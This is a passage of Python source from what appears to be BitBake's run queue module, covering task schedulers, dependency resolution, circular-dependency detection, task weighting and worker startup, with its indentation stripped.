def next(self):
"""
Return the id of the task we should build next
"""
if self.rq.can_start_task():
return self.next_buildable_task()
def newbuildable(self, task):
self.buildable.add(task)
def removebuildable(self, task):
self.buildable.remove(task)
def describe_task(self, taskid):
result = 'ID %s' % taskid
if self.rev_prio_map:
result = result + (' pri %d' % self.rev_prio_map[taskid])
return result
def dump_prio(self, comment):
bb.debug(3, '%s (most important first):\n%s' %
(comment,
'\n'.join(['%d. %s' % (index + 1, self.describe_task(taskid)) for
index, taskid in enumerate(self.prio_map)])))
class RunQueueSchedulerSpeed(RunQueueScheduler):
"""
A scheduler optimised for speed. The priority map is sorted by task weight,
heavier weighted tasks (tasks needed by the most other tasks) are run first.
"""
name = "speed"
def __init__(self, runqueue, rqdata):
"""
The priority map is sorted by task weight.
"""
RunQueueScheduler.__init__(self, runqueue, rqdata)
weights = {}
for tid in self.rqdata.runtaskentries:
weight = self.rqdata.runtaskentries[tid].weight
if not weight in weights:
weights[weight] = []
weights[weight].append(tid)
self.prio_map = []
for weight in sorted(weights):
for w in weights[weight]:
self.prio_map.append(w)
self.prio_map.reverse()
class RunQueueSchedulerCompletion(RunQueueSchedulerSpeed):
"""
A scheduler optimised to complete .bb files as quickly as possible. The
priority map is sorted by task weight, but then reordered so once a given
.bb file starts to build, it's completed as quickly as possible by
running all tasks related to the same .bb file one after the after.
This works well where disk space is at a premium and classes like OE's
rm_work are in force.
"""
name = "completion"
def __init__(self, runqueue, rqdata):
super(RunQueueSchedulerCompletion, self).__init__(runqueue, rqdata)
# Extract list of tasks for each recipe, with tasks sorted
# ascending from "must run first" (typically do_fetch) to
# "runs last" (do_build). The speed scheduler prioritizes
# tasks that must run first before the ones that run later;
# this is what we depend on here.
task_lists = {}
for taskid in self.prio_map:
fn, taskname = taskid.rsplit(':', 1)
task_lists.setdefault(fn, []).append(taskname)
# Now unify the different task lists. The strategy is that
# common tasks get skipped and new ones get inserted after the
# preceeding common one(s) as they are found. Because task
# lists should differ only by their number of tasks, but not
# the ordering of the common tasks, this should result in a
# deterministic result that is a superset of the individual
# task ordering.
all_tasks = []
for recipe, new_tasks in task_lists.items():
index = 0
old_task = all_tasks[index] if index < len(all_tasks) else None
for new_task in new_tasks:
if old_task == new_task:
# Common task, skip it. This is the fast-path which
# avoids a full search.
index += 1
old_task = all_tasks[index] if index < len(all_tasks) else None
else:
try:
index = all_tasks.index(new_task)
# Already present, just not at the current
# place. We re-synchronized by changing the
# index so that it matches again. Now
# move on to the next existing task.
index += 1
old_task = all_tasks[index] if index < len(all_tasks) else None
except ValueError:
# Not present. Insert before old_task, which
# remains the same (but gets shifted back).
all_tasks.insert(index, new_task)
index += 1
bb.debug(3, 'merged task list: %s' % all_tasks)
# Now reverse the order so that tasks that finish the work on one
# recipe are considered more imporant (= come first). The ordering
# is now so that do_build is most important.
all_tasks.reverse()
# Group tasks of the same kind before tasks of less important
# kinds at the head of the queue (because earlier = lower
# priority number = runs earlier), while preserving the
# ordering by recipe. If recipe foo is more important than
# bar, then the goal is to work on foo's do_populate_sysroot
# before bar's do_populate_sysroot and on the more important
# tasks of foo before any of the less important tasks in any
# other recipe (if those other recipes are more important than
# foo).
#
# All of this only applies when tasks are runable. Explicit
# dependencies still override this ordering by priority.
#
# Here's an example why this priority re-ordering helps with
# minimizing disk usage. Consider a recipe foo with a higher
# priority than bar where foo DEPENDS on bar. Then the
# implicit rule (from base.bbclass) is that foo's do_configure
# depends on bar's do_populate_sysroot. This ensures that
# bar's do_populate_sysroot gets done first. Normally the
# tasks from foo would continue to run once that is done, and
# bar only gets completed and cleaned up later. By ordering
# bar's task that depend on bar's do_populate_sysroot before foo's
# do_configure, that problem gets avoided.
task_index = 0
self.dump_prio('original priorities')
for task in all_tasks:
for index in range(task_index, self.numTasks):
taskid = self.prio_map[index]
taskname = taskid.rsplit(':', 1)[1]
if taskname == task:
del self.prio_map[index]
self.prio_map.insert(task_index, taskid)
task_index += 1
self.dump_prio('completion priorities')
class RunTaskEntry(object):
def __init__(self):
self.depends = set()
self.revdeps = set()
self.hash = None
self.unihash = None
self.task = None
self.weight = 1
class RunQueueData:
"""
BitBake Run Queue implementation
"""
def __init__(self, rq, cooker, cfgData, dataCaches, taskData, targets):
self.cooker = cooker
self.dataCaches = dataCaches
self.taskData = taskData
self.targets = targets
self.rq = rq
self.warn_multi_bb = False
self.stampwhitelist = cfgData.getVar("BB_STAMP_WHITELIST") or ""
self.multi_provider_whitelist = (cfgData.getVar("MULTI_PROVIDER_WHITELIST") or "").split()
self.setscenewhitelist = get_setscene_enforce_whitelist(cfgData)
self.setscenewhitelist_checked = False
self.setscene_enforce = (cfgData.getVar('BB_SETSCENE_ENFORCE') == "1")
self.init_progress_reporter = bb.progress.DummyMultiStageProcessProgressReporter()
self.reset()
def reset(self):
self.runtaskentries = {}
def runq_depends_names(self, ids):
import re
ret = []
for id in ids:
nam = os.path.basename(id)
nam = re.sub("_[^,]*,", ",", nam)
ret.extend([nam])
return ret
def get_task_hash(self, tid):
return self.runtaskentries[tid].hash
def get_task_unihash(self, tid):
return self.runtaskentries[tid].unihash
def get_user_idstring(self, tid, task_name_suffix = ""):
return tid + task_name_suffix
def get_short_user_idstring(self, task, task_name_suffix = ""):
(mc, fn, taskname, taskfn) = split_tid_mcfn(task)
pn = self.dataCaches[mc].pkg_fn[taskfn]
taskname = taskname_from_tid(task) + task_name_suffix
return "%s:%s" % (pn, taskname)
def circular_depchains_handler(self, tasks):
"""
Some tasks aren't buildable, likely due to circular dependency issues.
Identify the circular dependencies and print them in a user readable format.
"""
from copy import deepcopy
valid_chains = []
explored_deps = {}
msgs = []
class TooManyLoops(Exception):
pass
def chain_reorder(chain):
"""
Reorder a dependency chain so the lowest task id is first
"""
lowest = 0
new_chain = []
for entry in range(len(chain)):
if chain[entry] < chain[lowest]:
lowest = entry
new_chain.extend(chain[lowest:])
new_chain.extend(chain[:lowest])
return new_chain
def chain_compare_equal(chain1, chain2):
"""
Compare two dependency chains and see if they're the same
"""
if len(chain1) != len(chain2):
return False
for index in range(len(chain1)):
if chain1[index] != chain2[index]:
return False
return True
def chain_array_contains(chain, chain_array):
"""
Return True if chain_array contains chain
"""
for ch in chain_array:
if chain_compare_equal(ch, chain):
return True
return False
def find_chains(tid, prev_chain):
prev_chain.append(tid)
total_deps = []
total_deps.extend(self.runtaskentries[tid].revdeps)
for revdep in self.runtaskentries[tid].revdeps:
if revdep in prev_chain:
idx = prev_chain.index(revdep)
# To prevent duplicates, reorder the chain to start with the lowest taskid
# and search through an array of those we've already printed
chain = prev_chain[idx:]
new_chain = chain_reorder(chain)
if not chain_array_contains(new_chain, valid_chains):
valid_chains.append(new_chain)
msgs.append("Dependency loop #%d found:\n" % len(valid_chains))
for dep in new_chain:
msgs.append(" Task %s (dependent Tasks %s)\n" % (dep, self.runq_depends_names(self.runtaskentries[dep].depends)))
msgs.append("\n")
if len(valid_chains) > 10:
msgs.append("Aborted dependency loops search after 10 matches.\n")
raise TooManyLoops
continue
scan = False
if revdep not in explored_deps:
scan = True
elif revdep in explored_deps[revdep]:
scan = True
else:
for dep in prev_chain:
if dep in explored_deps[revdep]:
scan = True
if scan:
find_chains(revdep, copy.deepcopy(prev_chain))
for dep in explored_deps[revdep]:
if dep not in total_deps:
total_deps.append(dep)
explored_deps[tid] = total_deps
try:
for task in tasks:
find_chains(task, [])
except TooManyLoops:
pass
return msgs
def calculate_task_weights(self, endpoints):
"""
Calculate a number representing the "weight" of each task. Heavier weighted tasks
have more dependencies and hence should be executed sooner for maximum speed.
This function also sanity checks the task list finding tasks that are not
possible to execute due to circular dependencies.
"""
numTasks = len(self.runtaskentries)
weight = {}
deps_left = {}
task_done = {}
for tid in self.runtaskentries:
task_done[tid] = False
weight[tid] = 1
deps_left[tid] = len(self.runtaskentries[tid].revdeps)
for tid in endpoints:
weight[tid] = 10
task_done[tid] = True
while True:
next_points = []
for tid in endpoints:
for revdep in self.runtaskentries[tid].depends:
weight[revdep] = weight[revdep] + weight[tid]
deps_left[revdep] = deps_left[revdep] - 1
if deps_left[revdep] == 0:
next_points.append(revdep)
task_done[revdep] = True
endpoints = next_points
if len(next_points) == 0:
break
# Circular dependency sanity check
problem_tasks = []
for tid in self.runtaskentries:
if task_done[tid] is False or deps_left[tid] != 0:
problem_tasks.append(tid)
logger.debug(2, "Task %s is not buildable", tid)
logger.debug(2, "(Complete marker was %s and the remaining dependency count was %s)\n", task_done[tid], deps_left[tid])
self.runtaskentries[tid].weight = weight[tid]
if problem_tasks:
message = "%s unbuildable tasks were found.\n" % len(problem_tasks)
message = message + "These are usually caused by circular dependencies and any circular dependency chains found will be printed below. Increase the debug level to see a list of unbuildable tasks.\n\n"
message = message + "Identifying dependency loops (this may take a short while)...\n"
logger.error(message)
msgs = self.circular_depchains_handler(problem_tasks)
message = "\n"
for msg in msgs:
message = message + msg
bb.msg.fatal("RunQueue", message)
return weight
def prepare(self):
"""
Turn a set of taskData into a RunQueue and compute data needed
to optimise the execution order.
"""
runq_build = {}
recursivetasks = {}
recursiveitasks = {}
recursivetasksselfref = set()
taskData = self.taskData
found = False
for mc in self.taskData:
if len(taskData[mc].taskentries) > 0:
found = True
break
if not found:
# Nothing to do
return 0
self.init_progress_reporter.start()
self.init_progress_reporter.next_stage()
# Step A - Work out a list of tasks to run
#
# Taskdata gives us a list of possible providers for every build and run
# target ordered by priority. It also gives information on each of those
# providers.
#
# To create the actual list of tasks to execute we fix the list of
# providers and then resolve the dependencies into task IDs. This
# process is repeated for each type of dependency (tdepends, deptask,
# rdeptast, recrdeptask, idepends).
def add_build_dependencies(depids, tasknames, depends, mc):
for depname in depids:
# Won't be in build_targets if ASSUME_PROVIDED
if depname not in taskData[mc].build_targets or not taskData[mc].build_targets[depname]:
continue
depdata = taskData[mc].build_targets[depname][0]
if depdata is None:
continue
for taskname in tasknames:
t = depdata + ":" + taskname
if t in taskData[mc].taskentries:
depends.add(t)
def add_runtime_dependencies(depids, tasknames, depends, mc):
for depname in depids:
if depname not in taskData[mc].run_targets or not taskData[mc].run_targets[depname]:
continue
depdata = taskData[mc].run_targets[depname][0]
if depdata is None:
continue
for taskname in tasknames:
t = depdata + ":" + taskname
if t in taskData[mc].taskentries:
depends.add(t)
def add_mc_dependencies(mc, tid):
mcdeps = taskData[mc].get_mcdepends()
for dep in mcdeps:
mcdependency = dep.split(':')
pn = mcdependency[3]
frommc = mcdependency[1]
mcdep = mcdependency[2]
deptask = mcdependency[4]
if mc == frommc:
fn = taskData[mcdep].build_targets[pn][0]
newdep = '%s:%s' % (fn,deptask)
taskData[mc].taskentries[tid].tdepends.append(newdep)
for mc in taskData:
for tid in taskData[mc].taskentries:
(mc, fn, taskname, taskfn) = split_tid_mcfn(tid)
#runtid = build_tid(mc, fn, taskname)
#logger.debug(2, "Processing %s,%s:%s", mc, fn, taskname)
depends = set()
task_deps = self.dataCaches[mc].task_deps[taskfn]
self.runtaskentries[tid] = RunTaskEntry()
if fn in taskData[mc].failed_fns:
continue
# We add multiconfig dependencies before processing internal task deps (tdepends)
if 'mcdepends' in task_deps and taskname in task_deps['mcdepends']:
add_mc_dependencies(mc, tid)
# Resolve task internal dependencies
#
# e.g. addtask before X after Y
for t in taskData[mc].taskentries[tid].tdepends:
(depmc, depfn, deptaskname, _) = split_tid_mcfn(t)
depends.add(build_tid(depmc, depfn, deptaskname))
# Resolve 'deptask' dependencies
#
# e.g. do_sometask[deptask] = "do_someothertask"
# (makes sure sometask runs after someothertask of all DEPENDS)
if 'deptask' in task_deps and taskname in task_deps['deptask']:
tasknames = task_deps['deptask'][taskname].split()
add_build_dependencies(taskData[mc].depids[taskfn], tasknames, depends, mc)
# Resolve 'rdeptask' dependencies
#
# e.g. do_sometask[rdeptask] = "do_someothertask"
# (makes sure sometask runs after someothertask of all RDEPENDS)
if 'rdeptask' in task_deps and taskname in task_deps['rdeptask']:
tasknames = task_deps['rdeptask'][taskname].split()
add_runtime_dependencies(taskData[mc].rdepids[taskfn], tasknames, depends, mc)
# Resolve inter-task dependencies
#
# e.g. do_sometask[depends] = "targetname:do_someothertask"
# (makes sure sometask runs after targetname's someothertask)
idepends = taskData[mc].taskentries[tid].idepends
for (depname, idependtask) in idepends:
if depname in taskData[mc].build_targets and taskData[mc].build_targets[depname] and not depname in taskData[mc].failed_deps:
# Won't be in build_targets if ASSUME_PROVIDED
depdata = taskData[mc].build_targets[depname][0]
if depdata is not None:
t = depdata + ":" + idependtask
depends.add(t)
if t not in taskData[mc].taskentries:
bb.msg.fatal("RunQueue", "Task %s in %s depends upon non-existent task %s in %s" % (taskname, fn, idependtask, depdata))
irdepends = taskData[mc].taskentries[tid].irdepends
for (depname, idependtask) in irdepends:
if depname in taskData[mc].run_targets:
# Won't be in run_targets if ASSUME_PROVIDED
if not taskData[mc].run_targets[depname]:
continue
depdata = taskData[mc].run_targets[depname][0]
if depdata is not None:
t = depdata + ":" + idependtask
depends.add(t)
if t not in taskData[mc].taskentries:
bb.msg.fatal("RunQueue", "Task %s in %s rdepends upon non-existent task %s in %s" % (taskname, fn, idependtask, depdata))
# Resolve recursive 'recrdeptask' dependencies (Part A)
#
# e.g. do_sometask[recrdeptask] = "do_someothertask"
# (makes sure sometask runs after someothertask of all DEPENDS, RDEPENDS and intertask dependencies, recursively)
# We cover the recursive part of the dependencies below
if 'recrdeptask' in task_deps and taskname in task_deps['recrdeptask']:
tasknames = task_deps['recrdeptask'][taskname].split()
recursivetasks[tid] = tasknames
add_build_dependencies(taskData[mc].depids[taskfn], tasknames, depends, mc)
add_runtime_dependencies(taskData[mc].rdepids[taskfn], tasknames, depends, mc)
if taskname in tasknames:
recursivetasksselfref.add(tid)
if 'recideptask' in task_deps and taskname in task_deps['recideptask']:
recursiveitasks[tid] = []
for t in task_deps['recideptask'][taskname].split():
newdep = build_tid(mc, fn, t)
recursiveitasks[tid].append(newdep)
self.runtaskentries[tid].depends = depends
# Remove all self references
self.runtaskentries[tid].depends.discard(tid)
#self.dump_data()
self.init_progress_reporter.next_stage()
# Resolve recursive 'recrdeptask' dependencies (Part B)
#
# e.g. do_sometask[recrdeptask] = "do_someothertask"
# (makes sure sometask runs after someothertask of all DEPENDS, RDEPENDS and intertask dependencies, recursively)
# We need to do this separately since we need all of runtaskentries[*].depends to be complete before this is processed
# Generating/interating recursive lists of dependencies is painful and potentially slow
# Precompute recursive task dependencies here by:
# a) create a temp list of reverse dependencies (revdeps)
# b) walk up the ends of the chains (when a given task no longer has dependencies i.e. len(deps) == 0)
# c) combine the total list of dependencies in cumulativedeps
# d) optimise by pre-truncating 'task' off the items in cumulativedeps (keeps items in sets lower)
revdeps = {}
deps = {}
cumulativedeps = {}
for tid in self.runtaskentries:
deps[tid] = set(self.runtaskentries[tid].depends)
revdeps[tid] = set()
cumulativedeps[tid] = set()
# Generate a temp list of reverse dependencies
for tid in self.runtaskentries:
for dep in self.runtaskentries[tid].depends:
revdeps[dep].add(tid)
# Find the dependency chain endpoints
endpoints = set()
for tid in self.runtaskentries:
if len(deps[tid]) == 0:
endpoints.add(tid)
# Iterate the chains collating dependencies
while endpoints:
next = set()
for tid in endpoints:
for dep in revdeps[tid]:
cumulativedeps[dep].add(fn_from_tid(tid))
cumulativedeps[dep].update(cumulativedeps[tid])
if tid in deps[dep]:
deps[dep].remove(tid)
if len(deps[dep]) == 0:
next.add(dep)
endpoints = next
#for tid in deps:
# if len(deps[tid]) != 0:
# bb.warn("Sanity test failure, dependencies left for %s (%s)" % (tid, deps[tid]))
# Loop here since recrdeptasks can depend upon other recrdeptasks and we have to
# resolve these recursively until we aren't adding any further extra dependencies
extradeps = True
while extradeps:
extradeps = 0
for tid in recursivetasks:
tasknames = recursivetasks[tid]
totaldeps = set(self.runtaskentries[tid].depends)
if tid in recursiveitasks:
totaldeps.update(recursiveitasks[tid])
for dep in recursiveitasks[tid]:
if dep not in self.runtaskentries:
continue
totaldeps.update(self.runtaskentries[dep].depends)
deps = set()
for dep in totaldeps:
if dep in cumulativedeps:
deps.update(cumulativedeps[dep])
for t in deps:
for taskname in tasknames:
newtid = t + ":" + taskname
if newtid == tid:
continue
if newtid in self.runtaskentries and newtid not in self.runtaskentries[tid].depends:
extradeps += 1
self.runtaskentries[tid].depends.add(newtid)
# Handle recursive tasks which depend upon other recursive tasks
deps = set()
for dep in self.runtaskentries[tid].depends.intersection(recursivetasks):
deps.update(self.runtaskentries[dep].depends.difference(self.runtaskentries[tid].depends))
for newtid in deps:
for taskname in tasknames:
if not newtid.endswith(":" + taskname):
continue
if newtid in self.runtaskentries:
extradeps += 1
self.runtaskentries[tid].depends.add(newtid)
bb.debug(1, "Added %s recursive dependencies in this loop" % extradeps)
# Remove recrdeptask circular references so that do_a[recrdeptask] = "do_a do_b" can work
for tid in recursivetasksselfref:
self.runtaskentries[tid].depends.difference_update(recursivetasksselfref)
self.init_progress_reporter.next_stage()
#self.dump_data()
# Step B - Mark all active tasks
#
# Start with the tasks we were asked to run and mark all dependencies
# as active too. If the task is to be 'forced', clear its stamp. Once
# all active tasks are marked, prune the ones we don't need.
logger.verbose("Marking Active Tasks")
def mark_active(tid, depth):
"""
Mark an item as active along with its depends
(calls itself recursively)
"""
if tid in runq_build:
return
runq_build[tid] = 1
depends = self.runtaskentries[tid].depends
for depend in depends:
mark_active(depend, depth+1)
def invalidate_task(tid, error_nostamp):
(mc, fn, taskname, taskfn) = split_tid_mcfn(tid)
taskdep = self.dataCaches[mc].task_deps[taskfn]
if fn + ":" + taskname not in taskData[mc].taskentries:
logger.warning("Task %s does not exist, invalidating this task will have no effect" % taskname)
if 'nostamp' in taskdep and taskname in taskdep['nostamp']:
if error_nostamp:
bb.fatal("Task %s is marked nostamp, cannot invalidate this task" % taskname)
else:
bb.debug(1, "Task %s is marked nostamp, cannot invalidate this task" % taskname)
else:
logger.verbose("Invalidate task %s, %s", taskname, fn)
bb.parse.siggen.invalidate_task(taskname, self.dataCaches[mc], taskfn)
self.target_tids = []
for (mc, target, task, fn) in self.targets:
if target not in taskData[mc].build_targets or not taskData[mc].build_targets[target]:
continue
if target in taskData[mc].failed_deps:
continue
parents = False
if task.endswith('-'):
parents = True
task = task[:-1]
if fn in taskData[mc].failed_fns:
continue
# fn already has mc prefix
tid = fn + ":" + task
self.target_tids.append(tid)
if tid not in taskData[mc].taskentries:
import difflib
tasks = []
for x in taskData[mc].taskentries:
if x.startswith(fn + ":"):
tasks.append(taskname_from_tid(x))
close_matches = difflib.get_close_matches(task, tasks, cutoff=0.7)
if close_matches:
extra = ". Close matches:\n %s" % "\n ".join(close_matches)
else:
extra = ""
bb.msg.fatal("RunQueue", "Task %s does not exist for target %s (%s)%s" % (task, target, tid, extra))
# For tasks called "XXXX-", ony run their dependencies
if parents:
for i in self.runtaskentries[tid].depends:
mark_active(i, 1)
else:
mark_active(tid, 1)
self.init_progress_reporter.next_stage()
# Step C - Prune all inactive tasks
#
# Once all active tasks are marked, prune the ones we don't need.
delcount = {}
for tid in list(self.runtaskentries.keys()):
if tid not in runq_build:
delcount[tid] = self.runtaskentries[tid]
del self.runtaskentries[tid]
# Handle --runall
if self.cooker.configuration.runall:
# re-run the mark_active and then drop unused tasks from new list
runq_build = {}
for task in self.cooker.configuration.runall:
if not task.startswith("do_"):
task = "do_{0}".format(task)
runall_tids = set()
for tid in list(self.runtaskentries):
wanttid = "{0}:{1}".format(fn_from_tid(tid), task)
if wanttid in delcount:
self.runtaskentries[wanttid] = delcount[wanttid]
if wanttid in self.runtaskentries:
runall_tids.add(wanttid)
for tid in list(runall_tids):
mark_active(tid,1)
if self.cooker.configuration.force:
invalidate_task(tid, False)
for tid in list(self.runtaskentries.keys()):
if tid not in runq_build:
delcount[tid] = self.runtaskentries[tid]
del self.runtaskentries[tid]
if len(self.runtaskentries) == 0:
bb.msg.fatal("RunQueue", "Could not find any tasks with the tasknames %s to run within the recipes of the taskgraphs of the targets %s" % (str(self.cooker.configuration.runall), str(self.targets)))
self.init_progress_reporter.next_stage()
# Handle runonly
if self.cooker.configuration.runonly:
# re-run the mark_active and then drop unused tasks from new list
runq_build = {}
for task in self.cooker.configuration.runonly:
if not task.startswith("do_"):
task = "do_{0}".format(task)
runonly_tids = { k: v for k, v in self.runtaskentries.items() if taskname_from_tid(k) == task }
for tid in list(runonly_tids):
mark_active(tid,1)
if self.cooker.configuration.force:
invalidate_task(tid, False)
for tid in list(self.runtaskentries.keys()):
if tid not in runq_build:
delcount[tid] = self.runtaskentries[tid]
del self.runtaskentries[tid]
if len(self.runtaskentries) == 0:
bb.msg.fatal("RunQueue", "Could not find any tasks with the tasknames %s to run within the taskgraphs of the targets %s" % (str(self.cooker.configuration.runonly), str(self.targets)))
#
# Step D - Sanity checks and computation
#
# Check to make sure we still have tasks to run
if len(self.runtaskentries) == 0:
if not taskData[''].abort:
bb.msg.fatal("RunQueue", "All buildable tasks have been run but the build is incomplete (--continue mode). Errors for the tasks that failed will have been printed above.")
else:
bb.msg.fatal("RunQueue", "No active tasks and not in --continue mode?! Please report this bug.")
logger.verbose("Pruned %s inactive tasks, %s left", len(delcount), len(self.runtaskentries))
logger.verbose("Assign Weightings")
self.init_progress_reporter.next_stage()
# Generate a list of reverse dependencies to ease future calculations
for tid in self.runtaskentries:
for dep in self.runtaskentries[tid].depends:
self.runtaskentries[dep].revdeps.add(tid)
self.init_progress_reporter.next_stage()
# Identify tasks at the end of dependency chains
# Error on circular dependency loops (length two)
endpoints = []
for tid in self.runtaskentries:
revdeps = self.runtaskentries[tid].revdeps
if len(revdeps) == 0:
endpoints.append(tid)
for dep in revdeps:
if dep in self.runtaskentries[tid].depends:
bb.msg.fatal("RunQueue", "Task %s has circular dependency on %s" % (tid, dep))
logger.verbose("Compute totals (have %s endpoint(s))", len(endpoints))
self.init_progress_reporter.next_stage()
# Calculate task weights
# Check of higher length circular dependencies
self.runq_weight = self.calculate_task_weights(endpoints)
self.init_progress_reporter.next_stage()
# Sanity Check - Check for multiple tasks building the same provider
for mc in self.dataCaches:
prov_list = {}
seen_fn = []
for tid in self.runtaskentries:
(tidmc, fn, taskname, taskfn) = split_tid_mcfn(tid)
if taskfn in seen_fn:
continue
if mc != tidmc:
continue
seen_fn.append(taskfn)
for prov in self.dataCaches[mc].fn_provides[taskfn]:
if prov not in prov_list:
prov_list[prov] = [taskfn]
elif taskfn not in prov_list[prov]:
prov_list[prov].append(taskfn)
for prov in prov_list:
if len(prov_list[prov]) < 2:
continue
if prov in self.multi_provider_whitelist:
continue
seen_pn = []
# If two versions of the same PN are being built its fatal, we don't support it.
for fn in prov_list[prov]:
pn = self.dataCaches[mc].pkg_fn[fn]
if pn not in seen_pn:
seen_pn.append(pn)
else:
bb.fatal("Multiple versions of %s are due to be built (%s). Only one version of a given PN should be built in any given build. You likely need to set PREFERRED_VERSION_%s to select the correct version or don't depend on multiple versions." % (pn, " ".join(prov_list[prov]), pn))
msg = "Multiple .bb files are due to be built which each provide %s:\n %s" % (prov, "\n ".join(prov_list[prov]))
#
# Construct a list of things which uniquely depend on each provider
# since this may help the user figure out which dependency is triggering this warning
#
msg += "\nA list of tasks depending on these providers is shown and may help explain where the dependency comes from."
deplist = {}
commondeps = None
for provfn in prov_list[prov]:
deps = set()
for tid in self.runtaskentries:
fn = fn_from_tid(tid)
if fn != provfn:
continue
for dep in self.runtaskentries[tid].revdeps:
fn = fn_from_tid(dep)
if fn == provfn:
continue
deps.add(dep)
if not commondeps:
commondeps = set(deps)
else:
commondeps &= deps
deplist[provfn] = deps
for provfn in deplist:
msg += "\n%s has unique dependees:\n %s" % (provfn, "\n ".join(deplist[provfn] - commondeps))
#
# Construct a list of provides and runtime providers for each recipe
# (rprovides has to cover RPROVIDES, PACKAGES, PACKAGES_DYNAMIC)
#
msg += "\nIt could be that one recipe provides something the other doesn't and should. The following provider and runtime provider differences may be helpful."
provide_results = {}
rprovide_results = {}
commonprovs = None
commonrprovs = None
for provfn in prov_list[prov]:
provides = set(self.dataCaches[mc].fn_provides[provfn])
rprovides = set()
for rprovide in self.dataCaches[mc].rproviders:
if provfn in self.dataCaches[mc].rproviders[rprovide]:
rprovides.add(rprovide)
for package in self.dataCaches[mc].packages:
if provfn in self.dataCaches[mc].packages[package]:
rprovides.add(package)
for package in self.dataCaches[mc].packages_dynamic:
if provfn in self.dataCaches[mc].packages_dynamic[package]:
rprovides.add(package)
if not commonprovs:
commonprovs = set(provides)
else:
commonprovs &= provides
provide_results[provfn] = provides
if not commonrprovs:
commonrprovs = set(rprovides)
else:
commonrprovs &= rprovides
rprovide_results[provfn] = rprovides
#msg += "\nCommon provides:\n %s" % ("\n ".join(commonprovs))
#msg += "\nCommon rprovides:\n %s" % ("\n ".join(commonrprovs))
for provfn in prov_list[prov]:
msg += "\n%s has unique provides:\n %s" % (provfn, "\n ".join(provide_results[provfn] - commonprovs))
msg += "\n%s has unique rprovides:\n %s" % (provfn, "\n ".join(rprovide_results[provfn] - commonrprovs))
if self.warn_multi_bb:
logger.verbnote(msg)
else:
logger.error(msg)
self.init_progress_reporter.next_stage()
# Create a whitelist usable by the stamp checks
self.stampfnwhitelist = {}
for mc in self.taskData:
self.stampfnwhitelist[mc] = []
for entry in self.stampwhitelist.split():
if entry not in self.taskData[mc].build_targets:
continue
fn = self.taskData.build_targets[entry][0]
self.stampfnwhitelist[mc].append(fn)
self.init_progress_reporter.next_stage()
# Iterate over the task list looking for tasks with a 'setscene' function
self.runq_setscene_tids = set()
if not self.cooker.configuration.nosetscene:
for tid in self.runtaskentries:
(mc, fn, taskname, _) = split_tid_mcfn(tid)
setscenetid = tid + "_setscene"
if setscenetid not in taskData[mc].taskentries:
continue
self.runq_setscene_tids.add(tid)
self.init_progress_reporter.next_stage()
# Invalidate task if force mode active
if self.cooker.configuration.force:
for tid in self.target_tids:
invalidate_task(tid, False)
# Invalidate task if invalidate mode active
if self.cooker.configuration.invalidate_stamp:
for tid in self.target_tids:
fn = fn_from_tid(tid)
for st in self.cooker.configuration.invalidate_stamp.split(','):
if not st.startswith("do_"):
st = "do_%s" % st
invalidate_task(fn + ":" + st, True)
self.init_progress_reporter.next_stage()
# Create and print to the logs a virtual/xxxx -> PN (fn) table
for mc in taskData:
virtmap = taskData[mc].get_providermap(prefix="virtual/")
virtpnmap = {}
for v in virtmap:
virtpnmap[v] = self.dataCaches[mc].pkg_fn[virtmap[v]]
bb.debug(2, "%s resolved to: %s (%s)" % (v, virtpnmap[v], virtmap[v]))
if hasattr(bb.parse.siggen, "tasks_resolved"):
bb.parse.siggen.tasks_resolved(virtmap, virtpnmap, self.dataCaches[mc])
self.init_progress_reporter.next_stage()
bb.parse.siggen.set_setscene_tasks(self.runq_setscene_tids)
# Iterate over the task list and call into the siggen code
dealtwith = set()
todeal = set(self.runtaskentries)
while len(todeal) > 0:
for tid in todeal.copy():
if len(self.runtaskentries[tid].depends - dealtwith) == 0:
dealtwith.add(tid)
todeal.remove(tid)
self.prepare_task_hash(tid)
bb.parse.siggen.writeout_file_checksum_cache()
#self.dump_data()
return len(self.runtaskentries)
def prepare_task_hash(self, tid):
dc = bb.parse.siggen.get_data_caches(self.dataCaches, mc_from_tid(tid))
bb.parse.siggen.prep_taskhash(tid, self.runtaskentries[tid].depends, dc)
self.runtaskentries[tid].hash = bb.parse.siggen.get_taskhash(tid, self.runtaskentries[tid].depends, dc)
self.runtaskentries[tid].unihash = bb.parse.siggen.get_unihash(tid)
def dump_data(self):
"""
Dump some debug information on the internal data structures
"""
logger.debug(3, "run_tasks:")
for tid in self.runtaskentries:
logger.debug(3, " %s: %s Deps %s RevDeps %s", tid,
self.runtaskentries[tid].weight,
self.runtaskentries[tid].depends,
self.runtaskentries[tid].revdeps)
class RunQueueWorker():
def __init__(self, process, pipe):
self.process = process
self.pipe = pipe
class RunQueue:
def __init__(self, cooker, cfgData, dataCaches, taskData, targets):
self.cooker = cooker
self.cfgData = cfgData
self.rqdata = RunQueueData(self, cooker, cfgData, dataCaches, taskData, targets)
self.stamppolicy = cfgData.getVar("BB_STAMP_POLICY") or "perfile"
self.hashvalidate = cfgData.getVar("BB_HASHCHECK_FUNCTION") or None
self.depvalidate = cfgData.getVar("BB_SETSCENE_DEPVALID") or None
self.state = runQueuePrepare
# For disk space monitor
# Invoked at regular time intervals via the bitbake heartbeat event
# while the build is running. We generate a unique name for the handler
# here, just in case that there ever is more than one RunQueue instance,
# start the handler when reaching runQueueSceneInit, and stop it when
# done with the build.
self.dm = monitordisk.diskMonitor(cfgData)
self.dm_event_handler_name = '_bb_diskmonitor_' + str(id(self))
self.dm_event_handler_registered = False
self.rqexe = None
self.worker = {}
self.fakeworker = {}
def _start_worker(self, mc, fakeroot = False, rqexec = None):
logger.debug(1, "Starting bitbake-worker")
magic = "decafbad"
if self.cooker.configuration.profile:
magic = "decafbadbad"
if fakeroot:
magic = magic + "beef"
mcdata = self.cooker.databuilder.mcdata[mc]
fakerootcmd = shlex.split(mcdata.getVar("FAKEROOTCMD"))
fakerootenv = (mcdata.getVar("FAKEROOTBASEENV") or "").split()
env = os.environ.copy()
for key, value in (var.split('=') for var in fakerootenv):
env[key] = value
worker = subprocess.Popen(fakerootcmd + ["bitbake-worker", magic], stdout=subprocess.PIPE, stdin=subprocess.PIPE, env=env)
else:
worker = subprocess.Popen(["bitbake-worker", magic], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
bb.utils.nonblockingfd(worker.stdout)
workerpipe = runQueuePipe(worker.stdout, None, self.cfgData, self, rqexec)
workerdata = {
"taskdeps" : self.rqdata.dataCaches[mc].task_deps,
"fakerootenv" : self.rqdata.dataCaches[mc].fakerootenv,
"fakerootdirs" : self.rqdata.dataCaches[mc].fakerootdirs,
